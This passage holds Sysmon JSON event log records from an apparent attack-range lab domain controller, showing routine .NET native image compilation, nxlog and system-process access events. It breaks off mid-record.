{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7780,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.231\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1337-5F25-0000-0010C3750C00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.231","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1337-5F25-0000-0010C3750C00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7781,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:11.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:11.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7782,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:12.044\r\nProcessGuid: {E2A3D6B1-1337-5F25-0000-0010C3750C00}\r\nProcessId: 4548\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c4-0\\Microsoft.Transactions.Bridge.dll\r\nCreationUtcTime: 2020-08-01 07:01:12.044","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:12.044","ProcessGuid":"{E2A3D6B1-1337-5F25-0000-0010C3750C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c4-0\\Microsoft.Transactions.Bridge.dll","CreationUtcTime":"2020-08-01 07:01:12.044","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7783,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.106\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010F5BB0B00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.106","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010F5BB0B00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7784,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.106\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010F5BB0B00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.106","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010F5BB0B00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7785,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.106\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010F5BB0B00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.106","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010F5BB0B00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7786,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.153\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-001065800C00}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.153","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-001065800C00}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7787,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.153\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-001065800C00}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:12.153","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1338-5F25-0000-001065800C00}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7788,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:12.169\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1338-5F25-0000-001065800C00}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 